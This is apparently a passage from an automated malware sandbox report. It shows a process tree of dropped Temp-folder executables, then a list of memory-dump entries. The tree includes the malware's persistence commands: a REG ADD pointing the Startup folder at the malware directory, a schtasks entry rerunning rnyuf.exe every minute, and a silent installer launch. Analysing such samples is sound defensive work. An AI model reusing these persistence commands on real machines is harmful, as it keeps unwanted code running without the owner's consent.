                                                                                            C:\Users\Admin\AppData\Local\Temp\3BA.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            PID:2476
                                                                                            • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:1068
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                3⤵
                                                                                                  PID:1664
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                    4⤵
                                                                                                      PID:2436
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe" /F
                                                                                                    3⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:1760
                                                                                              • C:\Users\Admin\AppData\Local\Temp\9FCC.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\9FCC.exe
                                                                                                1⤵
                                                                                                  PID:3524
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-VARPQ.tmp\9FCC.tmp
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-VARPQ.tmp\9FCC.tmp" /SL5="$A017C,6477783,831488,C:\Users\Admin\AppData\Local\Temp\9FCC.exe"
                                                                                                    2⤵
                                                                                                      PID:3612
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9FCC.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\9FCC.exe" /VERYSILENT
                                                                                                        3⤵
                                                                                                          PID:2644
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-4HMC7.tmp\9FCC.tmp
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-4HMC7.tmp\9FCC.tmp" /SL5="$B017C,6477783,831488,C:\Users\Admin\AppData\Local\Temp\9FCC.exe" /VERYSILENT
                                                                                                            4⤵
                                                                                                              PID:1344
                                                                                                              • C:\Users\Admin\AppData\Roaming\TurboCollage Service\smartplug.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\TurboCollage Service\smartplug.exe"
                                                                                                                5⤵
                                                                                                                  PID:2516

                                                                                                        Network

                                                                                                        MITRE ATT&CK Enterprise v6

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • memory/268-121-0x0000000000400000-0x00000000023AF000-memory.dmp

                                                                                                          Filesize

                                                                                                          31.7MB

                                                                                                          Download

                                                                                                        • memory/268-115-0x0000000000220000-0x0000000000229000-memory.dmp

                                                                                                          Filesize

                                                                                                          36KB

                                                                                                          Download

                                                                                                        • memory/600-219-0x000007FEFC1D1000-0x000007FEFC1D3000-memory.dmp

                                                                                                          Filesize

                                                                                                          8KB

                                                                                                          Download

                                                                                                        • memory/600-222-0x00000000024A0000-0x00000000024A1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/600-224-0x0000000002720000-0x0000000002721000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/600-227-0x000000001AC40000-0x000000001AC41000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/600-220-0x0000000002370000-0x0000000002371000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/600-221-0x000000001AD20000-0x000000001AD21000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/600-223-0x00000000024D0000-0x00000000024D1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/752-185-0x0000000000010000-0x0000000000011000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/864-187-0x0000000000A60000-0x0000000000A61000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/1072-183-0x0000000000CB0000-0x0000000000CB1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/1156-189-0x0000000000380000-0x0000000000381000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/1352-134-0x00000000026F0000-0x0000000002706000-memory.dmp

                                                                                                          Filesize

                                                                                                          88KB

                                                                                                          Download

                                                                                                        • memory/1492-180-0x0000000004480000-0x000000000449C000-memory.dmp

                                                                                                          Filesize

                                                                                                          112KB

                                                                                                          Download

                                                                                                        • memory/1492-197-0x00000000045A0000-0x00000000045BA000-memory.dmp

                                                                                                          Filesize

                                                                                                          104KB

                                                                                                          Download

                                                                                                        • memory/1504-198-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                          Filesize

                                                                                                          120KB

                                                                                                          Download

                                                                                                        • memory/1504-202-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                          Filesize

                                                                                                          120KB

                                                                                                          Download

                                                                                                        • memory/1608-108-0x0000000001340000-0x0000000001341000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/1612-216-0x00000000003D0000-0x00000000003D1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/1612-102-0x0000000000A80000-0x0000000000A81000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/1656-191-0x0000000000DC0000-0x0000000000DC1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/1768-176-0x00000000012C0000-0x00000000012C1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/1940-181-0x0000000000850000-0x0000000000851000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/1968-61-0x0000000003940000-0x0000000003A7F000-memory.dmp

                                                                                                          Filesize

                                                                                                          1.2MB

                                                                                                          Download

                                                                                                        • memory/1968-60-0x0000000075DA1000-0x0000000075DA3000-memory.dmp

                                                                                                          Filesize

                                                                                                          8KB

                                                                                                          Download

                                                                                                        • memory/1980-178-0x0000000000F70000-0x0000000000F71000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/2024-188-0x0000000000D30000-0x0000000000D31000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/2040-190-0x0000000001110000-0x0000000001111000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/2300-199-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                          Filesize

                                                                                                          120KB

                                                                                                          Download

                                                                                                        • memory/2300-208-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                          Filesize

                                                                                                          120KB

                                                                                                          Download

                                                                                                        • memory/2504-203-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                          Filesize

                                                                                                          120KB

                                                                                                          Download

                                                                                                        • memory/2504-206-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                          Filesize

                                                                                                          120KB

                                                                                                          Download

                                                                                                        • memory/2520-212-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                          Filesize

                                                                                                          120KB

                                                                                                          Download

                                                                                                        • memory/2520-214-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                          Filesize

                                                                                                          120KB

                                                                                                          Download